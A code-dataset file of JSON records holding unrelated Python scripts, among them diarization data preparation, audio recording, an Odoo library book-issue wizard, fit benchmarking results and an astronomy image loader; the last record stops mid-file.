+{"seq_id":"420356339","text":"import os\nimport inspect\ndir_path = os.path.dirname(os.path.realpath(inspect.getfile(lambda: None)))\nauto_buildnumber_path = os.path.join(dir_path, \"auto_buildnumber\") # https://github.com/JackGruber/auto_buildnumber\n\nprint(\"\")\ntry:\n import sys\n sys.path.insert(0, auto_buildnumber_path)\n import versioning\n print(\"auto versioning\")\n versioning.UpdateVersionFile(\"include/version.h\", \"DEFINEHEADER\", False, \"include/version_build.h\")\nexcept:\n print(\"No auto versioning\")\nprint(\"\")","sub_path":"tools/platformio_versioning.py","file_name":"platformio_versioning.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"546459483","text":"import requests\nimport json,csv\nimport random,time\ndef parseData(vehicleNo,weightState,consignId):\n url1 = 'http://localhost:8080/a/gateconsign/consign/checkConsignByWeight?vehicleNo={}'.format(vehicleNo)\n res1 = requests.get(url1)\n d=dict(json.loads(res1.text))\n print(d.get('success'),d.get('msg'))\n if d.get(\"success\"):\n if weightState == '0':\n #一次过磅\n zl = random.randint(80000,120000)\n print('开始一次过磅重量:',zl)\n url2 = 'http://localhost:8080/a/weight/weight/saveweightConsign?id={}&zl={}'.format(consignId,zl)\n ret=requests.get(url2)\n print(ret.text)\n else:\n #二次过磅\n zl = random.randint(25000,30000)\n print('开始二次过磅重量:',zl)\n url2 = 'http://localhost:8080/a/weight/weight/updateweightConsign?id={}&zl={}'.format(consignId,zl)\n ret = requests.get(url2)\n print(ret.text)\n\ndef parseCsv(filePath):\n file = open(filePath,encoding='utf8')\n lines = csv.reader(file)\n for line in lines:\n vehicleNo = line[22]\n weightState = line[36]\n consignId = line[2]\n print(vehicleNo,'---',weightState,'---',consignId)\n parseData(vehicleNo,weightState,consignId)\n time.sleep(1)\nif __name__=='__main__':\n filepath = r\"C:\\Users\\user\\Desktop\\csv\\123.csv\"\n parseCsv(filepath)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"283909987","text":"import numpy as np\nimport os\n\nclass SpkRTTM(object):\n ''' Store message from RTTM file '''\n def __init__(self):\n self.spkid = set()\n self.vad_pair = {}\n self.label = {}\n\n # 填充说话人id、vad信息\n def append(self, line):\n items = line.strip().split()\n start = int(float(items[3])*100)\n end = int(float(items[3])*100 + float(items[4])*100)\n id = items[1] + '-' + items[7]\n if id not in self.spkid:\n self.spkid.add(id)\n self.vad_pair[id] = []\n self.vad_pair[id].append([start, end])\n\n # 将vad的(start, end)转化为0/1编码\n def vad2label(self):\n for id in self.spkid:\n length = max(np.array(self.vad_pair[id])[:, 1]) + 200 # additional 2s\n self.label[id] = np.zeros(length)\n for start, end in self.vad_pair[id]:\n self.label[id][start:end] = 1\n\n # 返回(start, end)时段内的说话人id\n def get_id(self, start, end):\n spkid = ''\n max_dur = 0\n sum_dur = 0\n for id in self.spkid:\n dur = sum(self.label[id][start:end])\n sum_dur += dur\n if(max_dur < dur):\n max_dur = dur\n spkid = id\n purity = max_dur/sum_dur\n return spkid, purity\n\n\nclass XvecSegments(object):\n def __init__(self):\n self.segments = []\n \n def append(self, seg_line, scp_line):\n _, _, start, end = seg_line.strip().split()\n start = int(float(start)*100)\n end = int(float(end)*100)\n location = scp_line.split()[1]\n self.segments.append([start, end, location])\n \n def rmoverlap(self):\n for i in range(len(self.segments)-1):\n end = self.segments[i][1]\n next_start = self.segments[i+1][0]\n if(end > next_start):\n self.segments[i][1] = self.segments[i+1][0] = (end + next_start)//2\n\n\ndatadirs = ['data/callhome1/', 'data/callhome2/']\nexpdirs = ['exp/xvector_nnet_1a/xvectors_callhome1/', 'exp/xvector_nnet_1a/xvectors_callhome2/']\n\nfor datadir, expdir in zip(datadirs, expdirs):\n # 读取fullref.rttm并构造SpkRTTM类,\n # 当输入(start, end),调用get_id返回时段内的说话人id\n spkref = {}\n with open(datadir + 'fullref.rttm') as ref_file:\n for line in ref_file.readlines():\n name = line.strip().split(' ')[1]\n if name not in spkref.keys():\n spkref[name] = SpkRTTM()\n spkref[name].append(line)\n for name in spkref.keys():\n spkref[name].vad2label()\n\n spkseg = {}\n with open(expdir + 'segments') as seg_file, open(expdir + 'xvector.scp') as xvec_scp:\n for seg_line, scp_line in zip(seg_file.readlines(), xvec_scp.readlines()):\n seg1, name, _, _ = seg_line.strip().split()\n seg2 = scp_line.strip().split()[0]\n assert(seg1 == seg2)\n if name not in spkseg.keys():\n spkseg[name] = XvecSegments()\n spkseg[name].append(seg_line, scp_line)\n for name in spkseg.keys():\n spkseg[name].rmoverlap()\n\n\n with open(datadir + 'xvector.scp', 'w') as xvec_wfile, open(datadir + 'hardref.rttm', 'w') as hardref_wfile:\n for name in spkref.keys():\n if name not in spkseg.keys():\n print('Miss {}'.format(name))\n continue\n for start, end, location in spkseg[name].segments:\n id, purity = spkref[name].get_id(start, end)\n xvec_wfile.write('{} {}\\n'.format(id, location))\n dur = float(end - start)/100\n start = float(start)/100\n hardref_wfile.write('SPEAKER {} 0 {} {} {} \\n'.format(\n name, start, dur, id\n ))\n os.system('src2/md-eval.pl -1 -c 0.25 -r {0}/fullref.rttm -s {0}/hardref.rttm 2>src2/.log > {0}/DER.txt'.format(datadir))","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"341779982","text":"#!/usr/bin/env python3\n\nimport pyaudio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\n\ndef time_axis(arr):\n return np.array(range(len(arr)))/44100\n\n\ndef plot(arr):\n fig, ax = plt.subplots()\n fig.text(0.5, 0.04, 'Zeit (s)', ha='center', va='center')\n fig.text(0.06, 0.5, 'Amplitude (V*)', ha='center', va='center', rotation='vertical')\n ax.plot(time_axis(arr), arr)\n plt.show()\n\n\nFORMAT = pyaudio.paInt16\nSAMPLEFREQ = 44100\nFRAMESIZE = 1024\nNOFFRAMES = 220\n\np = pyaudio.PyAudio()\nprint('running')\nstream = p.open(format=FORMAT, channels=1, rate=SAMPLEFREQ, input=True, frames_per_buffer=FRAMESIZE)\ndata = stream.read(NOFFRAMES * FRAMESIZE)\ndecoded = np.fromstring(data, 'Int16') / ((2**15)/2-1)\nstream.stop_stream()\nstream.close()\np.terminate()\nprint('done')\nprint(len(decoded))\n\nstart = np.argmax(np.abs(decoded) > 0.07) - 1024\nend = start + 44100\ntriggered = decoded[start:end]\ntriggered = np.concatenate((triggered, [0]*(44100 - end - start)))\n\nnp.savetxt(\"rechts_2_\" + str(int(time.time())) + \".csv\", triggered)\n\n\nplot(decoded)\nplot(triggered)\n#plot(decoded)\n","sub_path":"Aufgabe4/Code/soundrecord.py","file_name":"soundrecord.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334394378","text":"from __future__ import (absolute_import, division, print_function)\n\nimport os\n\nimport numpy as np\n\nGRAD_TOL = 1e-1\nRES_TOL = 1e-8\n\n\nclass FittingResult(object):\n \"\"\"\n Minimal definition of a class to hold results from a\n fitting problem test.\n \"\"\"\n\n def __init__(self, options=None, problem=None, fit_status=None,\n chi_sq=None, params=None, runtime=None, minimizer=None,\n ini_function_params=None, fin_function_params=None,\n error_flag=None):\n\n self.options = options\n self.problem = problem\n self.fit_status = fit_status\n self.params = params\n\n self.chi_sq = chi_sq\n self._min_chi_sq = None\n\n # Time it took to run the Fit algorithm\n self.runtime = runtime\n self._min_runtime = None\n\n # Minimizer for a certain problem and its function definition\n self.minimizer = minimizer\n self.ini_function_params = ini_function_params\n self.fin_function_params = fin_function_params\n\n # Controller error handling\n self.error_flag = error_flag\n\n self.value = None\n self.norm_value = None\n\n self.colour = None\n self.colour_runtime = None\n self.colour_acc = None\n\n # Defines the type of table to be produced\n self._table_type = None\n self.output_string_type = {\"abs\": '{:.4g}',\n \"rel\": '{:.4g}',\n \"both\": '{0:.4g} ({1:.4g})'}\n\n # Paths to various output files\n self.support_page_link = ''\n self.start_figure_link = ''\n self.figure_link = ''\n\n # Links will be displayed relative to this dir\n self.relative_dir = os.path.abspath(os.sep)\n\n # Error written to support page if plotting failed\n # Default can be overwritten with more information\n self.figure_error = 'Plotting Failed'\n\n # Print with html tag or not\n self.html_print = False\n\n # Marker to indicate this is the best fit for the problem\n # Used for the support pages\n self.is_best_fit = False\n\n # Boolean that checks return true or false depending whether\n # norm(J^T r), norm(J^T r)/norm(r) and/or norm(r) are smaller\n # than a set tolerance\n self._local_min = None\n\n @property\n def local_min(self):\n \"\"\"\n Getter for local_min. This indicates if the result is a\n local minimum\n\n :return: Whether the result is a minimum or not\n :rtype: bool\n \"\"\"\n if self.params is not None:\n r = self.problem.eval_r(self.params)\n min_test = np.matmul(self.problem.eval_j(self.params).T, r)\n norm_r = np.linalg.norm(r)\n norm_min_test = np.linalg.norm(min_test)\n self.norm_rel = norm_min_test / norm_r\n if norm_r <= RES_TOL or norm_min_test <= GRAD_TOL \\\n or self.norm_rel <= GRAD_TOL:\n self._local_min = \"True\"\n else:\n self._local_min = \"False\"\n else:\n self._local_min = \"False\"\n self.norm_rel = np.inf\n return self._local_min\n\n @local_min.setter\n def local_min(self, value):\n self._local_min = value\n\n def __str__(self):\n \"\"\"\n The string representation of this is used to create the tables.\n This creates a correct representation for the table that has been set.\n\n :return: Table dependant string representation\n :rtype: str\n \"\"\"\n if self.table_type is not None:\n output = self.table_output\n if self.html_print:\n link = os.path.relpath(path=self.support_page_link,\n start=self.relative_dir)\n if self.error_flag != 0:\n output += \"{}\".format(self.error_flag)\n output = '{1}'.format(link, output)\n elif self.error_flag != 0:\n output += \"[{}]\".format(self.error_flag)\n else:\n output = 'Fitting problem class: minimizer = {0}'.format(\n self.minimizer)\n return output\n\n @property\n def table_type(self):\n return self._table_type\n\n @table_type.setter\n def table_type(self, value):\n \"\"\"\n Switch table types and setup needed values for creating string output\n\n :param value: The table to set up for\n :type value: str\n \"\"\"\n self._table_type = value\n comp_mode = self.options.comparison_mode\n result_template = self.output_string_type[comp_mode]\n\n if value == \"runtime\":\n abs_value = [self.runtime]\n rel_value = [self.norm_runtime]\n self.colour = self.colour_runtime\n elif value == \"acc\":\n abs_value = [self.chi_sq]\n rel_value = [self.norm_acc]\n self.colour = self.colour_acc\n elif value == \"compare\":\n abs_value = [self.chi_sq, self.runtime]\n rel_value = [self.norm_acc, self.norm_runtime]\n self.colour = [self.colour_acc, self.colour_runtime]\n\n if value == \"local_min\":\n output = self.local_min\n self.table_output = output + \" (\" +\\\n self.output_string_type['abs'].format(self.norm_rel) + \")\"\n colour = [c[1] for c in self.options.colour_scale]\n self.colour = colour[0] if output == \"True\" else colour[-1]\n else:\n if comp_mode == \"abs\":\n self.table_output = \\\n '
'.join([result_template.format(v) for v in abs_value])\n elif comp_mode == \"rel\":\n self.table_output = \\\n '
'.join([result_template.format(v) for v in rel_value])\n elif comp_mode == \"both\":\n self.table_output = \\\n '
'.join([result_template.format(v1, v2)\n for v1, v2 in zip(abs_value, rel_value)])\n\n def set_colour_scale(self):\n \"\"\"\n Utility function set colour rendering for html tables\n \"\"\"\n colour_scale = self.options.colour_scale\n colour_bounds = [colour[0] for colour in colour_scale]\n # prepending 0 value for colour bound\n colour_bounds = [0] + colour_bounds\n html_colours = [colour[1] for colour in colour_scale]\n self.colour_runtime = colour_scale[-1]\n self.colour_acc = colour_scale[-1]\n for i in range(len(colour_bounds) - 1):\n if colour_bounds[i] < self.norm_runtime <= colour_bounds[i + 1]:\n self.colour_runtime = html_colours[i]\n if colour_bounds[i] < self.norm_acc <= colour_bounds[i + 1]:\n self.colour_acc = html_colours[i]\n\n @property\n def min_chi_sq(self):\n return self._min_chi_sq\n\n @min_chi_sq.setter\n def min_chi_sq(self, value):\n \"\"\"\n Stores the min chi squared and updates the normalised value\n\n :param value: New value for min_chi_sq\n :type value: float\n \"\"\"\n self._min_chi_sq = value\n if not self.chi_sq > 0:\n self.chi_sq = np.inf\n self.norm_acc = self.chi_sq / self.min_chi_sq\n\n @property\n def min_runtime(self):\n return self._min_runtime\n\n @min_runtime.setter\n def min_runtime(self, value):\n \"\"\"\n Stores the min runtime and updates the normalised value\n\n :param value: New value for min_runtime\n :type value: float\n \"\"\"\n self._min_runtime = value\n self.norm_runtime = self.runtime / self.min_runtime\n","sub_path":"fitbenchmarking/utils/fitbm_result.py","file_name":"fitbm_result.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"423272640","text":"def createdict():\n no = sum(1 for line in open('example graph.txt', 'r'))\n f=open('example graph.txt','r')\n D=dict()\n for i in range (1,no+1):\n L=f.readline()\n\n D[(L[0],L[2])]=int(L[4]+L[5])\n f.close()\n return D\n\ndef AdjacencyLists(s):\n f=open('example graph.txt','r')\n A=[]\n for i in range(1,9):\n L=f.readline()\n if s==L[0] :\n A.append(L[2])\n if s==L[2]:\n A.append(L[0])\n return A\n f.close() \n\n\ndef visited():\n f=open('example graph.txt','r')\n A=[]\n no = sum(1 for line in open('example graph.txt', 'r'))\n for i in range (1,no+1):\n L=f.readline()\n\n if L[0] not in A:\n A.append(L[0])\n if L[2] not in A:\n A.append(L[2])\n return(A)\n f.close()\n\n\n\n\ndef graph():\n g=dict()\n nodes=visited()\n for v in nodes :\n g[v]=set(AdjacencyLists(v))\n print(g)\n\n\ndef dfs_paths(graph, start_node, end_node):\n stack = [(start_node, [start_node])]\n while stack:\n (vertex, path) = stack.pop()\n for next in graph[vertex] - set(path):\n if next == end_node:\n yield path + [next]\n else:\n stack.append((next, path + [next]))\n return stack\n \n \n \ndef distpath(path):\n #Create matrix of distances\n D=createdict()\n L=[]\n for i in range(0,len(path)-1):\n L.append(D[(path[i],path[i+1])])\n\n return L\n\ndef findshortest(paths,b):\n L=[]\n for path in paths:\n L.append(sum(distpath(path))*b+(distpath(path)[0])*(1-b))\n\n x=L.index(min(L))\n return paths[x]\n \n\n\ndef psychology(s,t,b):\n M=[s]\n while t not in M:\n paths=AllSimplePaths(s,t)\n path=findshortest(paths,b)\n s=path[1]\n M.append(s)\n\n print(M,sum(distpath(M)))\n","sub_path":"present_bias.py","file_name":"present_bias.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"110625806","text":" # # vd: Bang luong (part time): stt ten Muc luong So gio lam \n# 1 H 22 14 \n# 2 L 90 12 \n# 3 T 80 12 \n# 1> mo ta bang luong bang code.\n# 2> tinh cuoi thang moi nguoi nhan bao nhieu tien\nfrom collections import OrderedDict\n\nr1 = {\n \"#\" : 1,\n \"name\" : \"Huy\",\n \"level\" : 25,\n \"hour\" : 14,\n}\nr2 = {\n \"#\" : 2,\n \"name\" : \"Hoa\",\n \"level\" : 20,\n \"hour\" : 7,\n}\nr3 = {\n \"#\" : 3,\n \"name\" : \"Tam\",\n \"level\" : 15,\n \"hour\" : 20,\n}\n\nsalary_list = [r1, r2, r3]\ntotal_wage = 0\nwage_list =[]\n# salary = salary_list[1]\n\nfor salary in salary_list:\n name = salary[\"name\"]\n hour = salary[\"hour\"]\n level = salary[\"level\"]\n wage_info = OrderedDict({\n \"name\" : name,\n \"wage\" : hour * level,\n })\n wage_list.append(wage_info)\n wage = hour * level\n total_wage += wage\n\n print(name, \"'s wage: \", wage)\nprint(\"Total wage: \", total_wage)\nprint(wage_list)\n\n\nimport pyexcel\n\npyexcel.save_as(records=wage_list,dest_file_name =\"wage_output.xlsx\")\n#print(salary_list)\n\n# for x in salary_list:\n# print(x)\n","sub_path":"Session04/salary.py","file_name":"salary.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"618927940","text":"# -*- coding: utf-8 -*-\n###############################################################################\n#\n# Tech-Receptives Solutions Pvt. Ltd.\n# Copyright (C) 2009-TODAY Tech-Receptives().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program. If not, see .\n#\n###############################################################################\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import except_orm,Warning\n\nfrom ..models import book_unit\nimport datetime\n\n\nclass IssueBook(models.TransientModel):\n\n \"\"\" Issue Book \"\"\"\n _name = 'issue.book'\n\n book_id = fields.Many2one('op.book', 'Book', required=True)\n book_unit_id = fields.Many2one('op.book.unit', 'Book Unit', required=True)\n isbn = fields.Char('ISBN13 Code', size=16)\n ean = fields.Char('EAN10 Code', size=16)\n barcode = fields.Char('Barcode', size=20)\n type = fields.Selection(\n [('student', 'Student'), ('faculty', 'Faculty')],\n 'Type', required=True)\n #student_id = fields.Many2one('op.student', 'Student')\n student_id = fields.Many2one('res.partner', 'Student')\n class_id = fields.Many2one('course',string=\"Class\")\n student_section_id = fields.Many2one('section', 'Admitted section')\n faculty_id = fields.Many2one('op.faculty', 'Faculty')\n library_card_id = fields.Many2one(\n 'op.library.card', 'Library Card', required=True)\n issued_date = fields.Date('Issued Date', required=True, default=lambda self: fields.Date.today())\n return_date = fields.Date('Return Date', required=True)\n\n @api.onchange('library_card_id')\n def onchange_library_card_id(self):\n self.type = self.library_card_id.type\n if self.type == 'student':\n self.student_id = self.library_card_id.student_id.id\n self.return_date = datetime.datetime.now() + datetime.timedelta(self.library_card_id.return_days)\n self.faculty_id = self.library_card_id.faculty_id.id\n\n @api.onchange('book_id')\n def onchange_book_id(self):\n self.isbn = self.book_id.isbn\n self.ean = self.book_id.ean\n\n @api.onchange('book_unit_id')\n def onchange_book_unit_id(self):\n self.barcode = self.book_unit_id.barcode\n\n\n @api.onchange('student_id')\n def onchange_student_id(self):\n lib_card_obj= self.env['op.library.card']\n self.class_id = self.student_id.class_id.id\n self.student_section_id = self.student_id.student_section_id.id\n self.library_card_id = self.student_id.library_card_id.id\n if not self.student_id.library_card_id and self.type == 'student':\n warning = {\n 'title': _('Warning!'),\n 'message': _('No Library card found for this student!'),\n }\n return {'warning': warning}\n if self.type and not lib_card_obj.sudo().search([(\"student_id\",\"=\",self.student_id.id)]):\n warning = {\n 'title': _('Warning!'),\n 'message': _('Library card deactivated this student!'),\n }\n return {'warning': warning}\n\n @api.onchange('faculty_id')\n def onchange_faculty_id(self):\n \n lib_card_obj= self.env['op.library.card']\n self.library_card_id = self.faculty_id.library_card_id.id\n if not self.library_card_id and self.type == 'faculty':\n warning = {\n 'title': _('Warning!'),\n 'message': _('No Library card found for this faculty!'),\n }\n if self.type and not lib_card_obj.sudo().search([(\"faculty_id\",\"=\",self.faculty_id.id)]):\n warning = {\n 'title': _('Warning!'),\n 'message': _('Library card deactivated this faculty!'),\n }\n return {'warning': warning}\n\n\n\n @api.one\n def check_max_issue(self, student_id,faculty_id, library_card_id):\n if self.type==\"student\":\n \n book_movement_search = self.env[\"op.book.movement\"].search(\n [('library_card_id', '=', library_card_id),\n ('student_id', '=', student_id),\n ('state', '=', 'issue')])\n else:\n book_movement_search = self.env[\"op.book.movement\"].search(\n [('library_card_id', '=', library_card_id),\n ('faculty_id', '=', faculty_id),\n ('state', '=', 'issue')]) \n \n if len(book_movement_search) < self.env[\"op.library.card\"].browse(\n library_card_id).library_card_type_id.allow_book:\n return True\n else:\n return False\n\n @api.one\n def do_issue(self):\n value = {}\n \n # CHECK IF LIBRRAY CARD DEACTIVATED\n lib_card_obj= self.env['op.library.card']\n if self.type==\"student\":\n if not lib_card_obj.sudo().search([(\"student_id\",\"=\",self.student_id.id)]):\n raise except_orm(_('Warning!'),\n _(\"Library card deactivated this student!\"))\n else:\n if not lib_card_obj.sudo().search([(\"faculty_id\",\"=\",self.faculty_id.id)]):\n raise except_orm(_('Warning!'),\n _(\"Library card deactivated this faculty!\")) \n\n \n # CHECK ALLOWED BOOKS PER LIBRARY CARD\n #RETURN FALSE IF IT REACHES THE LIMIT\n \n if any(self.check_max_issue(self.student_id.id,self.faculty_id.id, self.library_card_id.id)):\n if self.book_unit_id.state and \\\n self.book_unit_id.state == 'available':\n \n book_movement_create = {\n 'book_id': self.book_id.id,\n 'book_unit_id': self.book_unit_id.id,\n 'type': self.type,\n 'student_id': self.student_id.id or False,\n 'faculty_id': self.faculty_id.id or False,\n 'library_card_id': self.library_card_id.id,\n 'issued_date': self.issued_date,\n 'return_date': self.return_date,\n 'library_id': self.env.context.get('library_id') or False,\n 'state': 'issue',\n }\n self.env['op.book.movement'].create(book_movement_create)\n self.book_unit_id.state = 'issue'\n value = {'type': 'ir.actions.act_window_close'}\n else:\n raise Warning(_('Error!'), _(\n \"Book Unit can not be issued because it's state is : %s\") %\n (dict(book_unit.unit_states).get(\n self.book_unit_id.state)))\n else:\n if self.type ==\"student\":\n \n partner_name = self.student_id.name\n else:\n partner_name = self.faculty_id.name\n \n raise Warning(_('Error!'), _(\n 'Maximum Number of book allowed for %s is : %s') %\n (partner_name,\n self.library_card_id.library_card_type_id.allow_book))\n return value\n\n# class OpFaculty(models.Model):\n# _inherit = 'op.faculty'\n#\n# @api.multi\n# def name_get(self):\n# result = []\n# for record in self:\n# result.append([record.id, \"%s %s %s\" % (record.name, record.middle_name, record.last_name)])\n# return result\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"openeducat_library/wizards/issue_book.py","file_name":"issue_book.py","file_ext":"py","file_size_in_byte":8075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"353898532","text":"import random\n\nimport itertools\n\n\nclass Edge:\n\n def __init__(self, gid, source, target, length, length_m, start, end, cost, cost_s, one_way):\n self.gid = gid\n self.source = source\n self.target = target\n self.length = length\n self.length_m = length_m\n self.start = start\n self.end = end\n self.cost = cost\n self.cost_s = cost_s\n self.one_way = one_way\n self.spots = []\n\n\n def create_spot(self, spot_length, spots):\n \"\"\"\n create spots in this edge\n :param spot_length: length of spot\n :param spots:\n :return:\n \"\"\"\n self.total_spots = len(spots)\n if len(spots) == 0:\n # no parking spots\n return\n if self.length_m / spot_length < len(spots):\n # parking spots on both sides of the road\n random.seed(0)\n random.shuffle(spots)\n half = int(len(spots) / 2)\n a = spots[:half]\n b = spots[half:]\n c = list(map(sum, itertools.zip_longest(a, b, fillvalue=0)))\n self.spots = c\n else:\n # parking spots on only one side of the road\n random.seed(0)\n random.shuffle(spots)\n self.spots = spots\n\n\n def create_drive_spot(self, spot_length):\n self.spots = [-1] * int(self.length_m / spot_length)\n\n\n def has_next_spot(self, offset, spot_length):\n if offset % spot_length < len(self.spots):\n return True\n else:\n return False\n\n def spot_status(self, offset, spot_length):\n if offset % spot_length <= len(self.spots):\n return self.spots[offset % spot_length]\n else:\n raise Exception()\n\n def __str__(self):\n return \"Edge:\" + str(self.gid) + \" \" + str(sum(self.spots))\n\n def __hash__(self):\n return hash(self.gid)\n\n def __eq__(self, other):\n return self.gid == other.gid","sub_path":"seattle_experiment/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452637479","text":"from django.contrib import admin\nimport datetime\n\n# Register your models here.\nfrom .models import Product\n\n\n\n@admin.register(Product)\nclass ProductAdmin(admin.ModelAdmin):\n\texclude = ['created_by','modified_by','created_datetime','modified_datetime','user_name']\n\tdef save_model(self, request, obj, form, change):\n\t\tif not obj.pk:\n\t\t\tobj.created_by\t\t\t=\trequest.user.id\n\t\t\tobj.created_datetime\t=\tdatetime.datetime.now()\n\t\t\tif request.user.first_name !=\"\" and request.user.last_name !=\"\":\n\t\t\t\tobj.user_name\t\t=\trequest.user.first_name+\" \"+request.user.last_name\n\t\t\telse:\n\t\t\t\tobj.user_name\t\t=\trequest.user.username\n\t\t\tif \tobj.Email == \"\" or obj.Email is None:\n\t\t\t\tobj.Email\t\t\t=\trequest.user.email\t \n\t\t\tsuper().save_model(request, obj, form, change)\n\t\tif change:\n\t\t\tobj.modified_by\t\t\t\t=\trequest.user.id\n\t\t\tobj.modified_datetime\t\t=\tdatetime.datetime.now()\n\t\t\tif request.user.first_name !=\"\" and request.user.last_name !=\"\":\n\t\t\t\tobj.user_name\t\t=\trequest.user.first_name+\" \"+request.user.last_name\n\t\t\telse:\n\t\t\t\tobj.user_name\t\t\t=\trequest.user.username\n\t\t\tif \tobj.Email == \"\" or obj.Email is None:\n\t\t\t\tobj.Email\t\t\t=\trequest.user.email\n\t\t\tsuper().save_model(request, obj, form, change)\n","sub_path":"src/products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106135100","text":"from hashlib import md5\nfrom random import choice\nfrom statistics import mean\nfrom string import ascii_lowercase\nfrom time import time\n\nalphabet = list(ascii_lowercase)\nalphabet_bytes = []\n\nfor letter in alphabet:\n alphabet_bytes.append(bytes(letter, 'ascii'))\n\nduration_list = []\n\nfor i in range(10):\n preimage_seed = choice(alphabet_bytes)\n test_hash = md5(preimage_seed).hexdigest()\n start_time = time()\n \n for letter in alphabet_bytes:\n if md5(letter).hexdigest() == test_hash:\n duration = time() - start_time\n duration_list.append(duration)\n print(f'{letter} is the preimage_seed! - {duration:.10f} seconds')\n break\n\nprint(f'\\nAverage: {mean(duration_list):.10f} seconds')\n","sub_path":"chapter-2-hashing/exercise_2_5.py","file_name":"exercise_2_5.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626650308","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport csv\n\ntop_disease_list = [\"上呼吸道感染\", \"小儿发热\", \"小儿消化不良\", \"小儿支气管炎\",\"小儿腹泻\"]\n\n# 频率较高的五种疾病数据\n# top_disease_file = \"./../resources/top_disease_data.csv\"\n# top_disease_data = pd.read_csv(top_disease_file,sep=\"\\t\")\n\n#患者主诉与病症匹配之后的数据,但是包含全部疾病的,需要提取前五种疾病\ndisease_symptom_file = open(\"./../resources/disease_symptom.csv\",mode='r',encoding=\"utf-8\")\nsymptom_reader = csv.reader(disease_symptom_file)\n\nsave_file = open(\"./../resources/top_disease_symptom.csv\",encoding=\"utf-8\",mode=\"w\")\nwriter = csv.writer(save_file)\n\nindex = 0\nfor line in symptom_reader:\n if line[5] in top_disease_list:\n print(line)\n # writer.writerow(line)\n index += 1\nprint(index)\n\nsave_file.close()\ndisease_symptom_file.close()\n\n\n\n","sub_path":"preprocess/match_disease.py","file_name":"match_disease.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"511943956","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/pyproffit/data.py\n# Compiled at: 2020-04-23 04:51:54\n# Size of source mod 2**32: 9181 bytes\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import wcs\nfrom scipy.ndimage.filters import gaussian_filter\nfrom scipy.interpolate import griddata\n\ndef get_extnum(fitsfile):\n next = 0\n if fitsfile[0].header['NAXIS'] == 2:\n return 0\n print('Primary HDU is not an image, moving on')\n nhdu = len(fitsfile)\n if nhdu == 1:\n print('Error: No IMAGE extension found in input file')\n return -1\n cont = 1\n next = 1\n while cont:\n if next < nhdu:\n extension = fitsfile[next].header['XTENSION']\n if extension == 'IMAGE':\n print('IMAGE HDU found in extension ', next)\n cont = 0\n else:\n next = next + 1\n\n if cont == 1:\n print('Error: No IMAGE extension found in input file')\n return -1\n return next\n\n\nclass Data:\n\n def __init__(self, imglink, explink=None, bkglink=None, voronoi=False, rmsmap=None):\n if imglink is None:\n print('Error: Image file not provided')\n return\n fimg = fits.open(imglink)\n next = get_extnum(fimg)\n self.img = fimg[next].data.astype(float)\n head = fimg[next].header\n self.header = head\n self.wcs_inp = wcs.WCS(head, relax=False)\n if 'CDELT2' in head:\n self.pixsize = head['CDELT2'] * 60.0\n else:\n if 'CD2_2' in head:\n self.pixsize = head['CD2_2'] * 60.0\n else:\n print('No pixel size could be found in header, will assume a pixel size of 2.5 arcsec')\n self.pixsize = 0.041666666666666664\n self.axes = self.img.shape\n if voronoi:\n self.errmap = fimg[1].data.astype(float)\n fimg.close()\n if explink is None:\n self.exposure = np.ones(self.axes)\n else:\n fexp = fits.open(explink)\n next = get_extnum(fexp)\n expo = fexp[next].data.astype(float)\n if expo.shape != self.axes:\n print('Error: Image and exposure map sizes do not match')\n return\n self.exposure = expo\n fexp.close()\n if bkglink is None:\n self.bkg = np.zeros(self.axes)\n else:\n fbkg = fits.open(bkglink)\n next = get_extnum(fbkg)\n bkg = fbkg[next].data.astype(float)\n if bkg.shape != self.axes:\n print('Error: Image and background map sizes do not match')\n return\n self.bkg = bkg\n fbkg.close()\n elif rmsmap is not None:\n frms = fits.open(rmsmap)\n next = get_extnum(frms)\n rms = frms[next].data.astype(float)\n if rms.shape != self.axes:\n print('Error: Image and RMS 